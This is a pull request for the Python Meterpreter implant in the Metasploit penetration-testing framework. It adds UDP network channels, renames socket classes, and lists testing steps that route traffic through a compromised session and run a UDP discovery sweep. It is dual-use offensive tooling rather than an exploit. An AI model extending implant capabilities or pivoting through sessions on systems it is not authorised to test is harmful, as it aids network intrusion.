### PR TITLE
Add UDP channel support to the Python Meterpreter

### DIFF
--- a/python/meterpreter/ext_server_stdapi.py
+++ b/python/meterpreter/ext_server_stdapi.py
@@ -888,6 +888,18 @@ def channel_open_stdapi_net_tcp_server(request, response):
     return ERROR_SUCCESS, response
 
 @register_function
+def channel_open_stdapi_net_udp_client(request, response):
+    local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST).get('value', '0.0.0.0')
+    local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT).get('value', 0)
+    peer_host = packet_get_tlv(request, TLV_TYPE_PEER_HOST)['value']
+    peer_port = packet_get_tlv(request, TLV_TYPE_PEER_PORT).get('value', 0)
+    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    sock.bind((local_host, local_port))
+    channel_id = meterpreter.add_channel(MeterpreterSocketUDPClient(sock, (peer_host, peer_port)))
+    response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+    return ERROR_SUCCESS, response
+
+@register_function
 def stdapi_sys_config_getenv(request, response):
     for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
         pgroup = bytes()

--- a/python/meterpreter/ext_server_stdapi.py
+++ b/python/meterpreter/ext_server_stdapi.py
@@ -1006,7 +1006,7 @@ def stdapi_sys_process_execute(request, response):
     response += tlv_pack(TLV_TYPE_PID, proc_h.pid)
     response += tlv_pack(TLV_TYPE_PROCESS_HANDLE, proc_h_id)
     if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
-        channel_id = meterpreter.add_channel(proc_h)
+        channel_id = meterpreter.add_channel(MeterpreterProcess(proc_h))
         response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
     return ERROR_SUCCESS, response
 

--- a/python/meterpreter/ext_server_stdapi.py
+++ b/python/meterpreter/ext_server_stdapi.py
@@ -871,7 +871,7 @@ def channel_open_stdapi_net_tcp_client(request, response):
             pass
     if not connected:
         return ERROR_CONNECTION_ERROR, response
-    channel_id = meterpreter.add_channel(MeterpreterSocketClient(sock))
+    channel_id = meterpreter.add_channel(MeterpreterSocketTCPClient(sock))
     response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
     return ERROR_SUCCESS, response
 
@@ -883,7 +883,7 @@ def channel_open_stdapi_net_tcp_server(request, response):
     server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
     server_sock.bind((local_host, local_port))
     server_sock.listen(socket.SOMAXCONN)
-    channel_id = meterpreter.add_channel(MeterpreterSocketServer(server_sock))
+    channel_id = meterpreter.add_channel(MeterpreterSocketTCPServer(server_sock))
     response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
     return ERROR_SUCCESS, response
 

--- a/python/meterpreter/ext_server_stdapi.py
+++ b/python/meterpreter/ext_server_stdapi.py
@@ -1686,7 +1686,7 @@ def stdapi_net_socket_tcp_shutdown(request, response):
     channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
     how = packet_get_tlv(request, TLV_TYPE_SHUTDOWN_HOW).get('value', socket.SHUT_RDWR)
     channel = meterpreter.channels[channel_id]
-    channel.shutdown(how)
+    channel.sock.shutdown(how)
     return ERROR_SUCCESS, response
 
 def _linux_get_maps():

--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -1073,7 +1073,7 @@ class PythonMeterpreter(object):
                         self.send_packet(tlv_pack_request('tcp_channel_open', [
                             {'type': TLV_TYPE_CHANNEL_ID, 'value': client_channel_id},
                             {'type': TLV_TYPE_CHANNEL_PARENTID, 'value': channel_id},
-                            {'type': TLV_TYPE_LOCAL_HOST, 'value': inet_pton(channel.family, server_addr[0])},
+                            {'type': TLV_TYPE_LOCAL_HOST, 'value': inet_pton(channel.sock.family, server_addr[0])},
                             {'type': TLV_TYPE_LOCAL_PORT, 'value': server_addr[1]},
                             {'type': TLV_TYPE_PEER_HOST, 'value': inet_pton(client_sock.family, client_addr[0])},
                             {'type': TLV_TYPE_PEER_PORT, 'value': client_addr[1]},

--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -1136,7 +1136,9 @@ class PythonMeterpreter(object):
         channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
         handler = 'channel_open_' + channel_type['value']
         if handler not in self.extension_functions:
+            debug_print('[-] core_channel_open missing handler: ' + handler)
             return error_result(NotImplementedError), response
+        debug_print('[*] core_channel_open dispatching to handler: ' + handler)
         handler = self.extension_functions[handler]
         return handler(request, response)
 

--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -401,14 +401,14 @@ class MeterpreterSocket(object):
 export(MeterpreterSocket)
 
 #@export
-class MeterpreterSocketClient(MeterpreterSocket):
+class MeterpreterSocketTCPClient(MeterpreterSocket):
     pass
-export(MeterpreterSocketClient)
+export(MeterpreterSocketTCPClient)
 
 #@export
-class MeterpreterSocketServer(MeterpreterSocket):
+class MeterpreterSocketTCPServer(MeterpreterSocket):
     pass
-export(MeterpreterSocketServer)
+export(MeterpreterSocketTCPServer)
 
 class STDProcessBuffer(threading.Thread):
     def __init__(self, std, is_alive):
@@ -917,7 +917,7 @@ class PythonMeterpreter(object):
                         data = channel.stdout_reader.read()
                     elif channel.poll() != None:
                         self.handle_dead_resource_channel(channel_id)
-                elif isinstance(channel, MeterpreterSocketClient):
+                elif isinstance(channel, MeterpreterSocketTCPClient):
                     while select.select([channel.fileno()], [], [], 0)[0]:
                         try:
                             d = channel.recv(1)
@@ -927,11 +927,11 @@ class PythonMeterpreter(object):
                             self.handle_dead_resource_channel(channel_id)
                             break
                         data += d
-                elif isinstance(channel, MeterpreterSocketServer):
+                elif isinstance(channel, MeterpreterSocketTCPServer):
                     if select.select([channel.fileno()], [], [], 0)[0]:
                         (client_sock, client_addr) = channel.accept()
                         server_addr = channel.getsockname()
-                        client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
+                        client_channel_id = self.add_channel(MeterpreterSocketTCPClient(client_sock))
                         pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
                         pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
                         pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))

--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -1038,7 +1038,7 @@ class PythonMeterpreter(object):
                     self._transport_sleep = None
                     if not self.transport.activate():
                         self.transport_change()
-                continue
+                    continue
             # iterate over the keys because self.channels could be modified if one is closed
             channel_ids = list(self.channels.keys())
             for channel_id in channel_ids:


### PR DESCRIPTION
This pull requests adds UDP channel support to the Python Meterpreter. This required a bit of refactoring around the channel code to move alot of the logic into the new `MeterpreterChannel` object. This provides a basic interface that can be overridden to implement specific channel types. For example, this allows the UDP channel to take additional peer arguments in the `core_channel_write` request handler.

## Testing Steps
- [x] Get a `python/meterpreter` session
- [x] Generic channel related tests
  - [x] Load the test modules with `loadpath test/modules`
  - [x] Run `post/test/meterpreter` and ensure all tests pass
  - [x] Run `post/test/file` and ensure all tests pass (file channel tests)
  - [x] Interact with the session and verify the shell command works as expected (process channel tests)
- [x] UDP channel related tests
  - [x] Route all traffic through the meterpreter session with `route add 0.0.0.0/0 -1`
  - [x] Run `auxiliary/scanner/discovery/udp_sweep` with an applicable `RHOSTS` setting
  - [x] See results from the module showing the data was sent and received over the channel instead of an exception saying the channel couldn't be opened